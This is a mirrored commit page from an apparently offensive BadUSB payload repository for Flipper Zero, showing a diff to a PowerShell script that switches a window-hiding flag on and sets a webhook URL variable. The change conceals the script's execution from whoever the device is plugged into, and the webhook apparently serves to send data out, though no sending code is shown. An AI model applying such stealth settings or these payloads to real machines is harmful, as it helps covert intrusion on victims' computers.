mirror of
https://github.com/beigeworm/BadUSB-Files-For-FlipperZero.git
synced 2026-01-06 09:43:55 -08:00
Update main.ps1
This commit is contained in:
@@ -1,6 +1,6 @@
|
||||
$webhookUrl = "$dc"
|
||||
|
||||
$hideWindow = 0 # 1 = Hidden
|
||||
$hideWindow = 1 # 1 = Hidden
|
||||
|
||||
[Console]::BackgroundColor = "Black"
|
||||
[Console]::SetWindowSize(60, 20)
|
||||
|
||||
Reference in New Issue
Block a user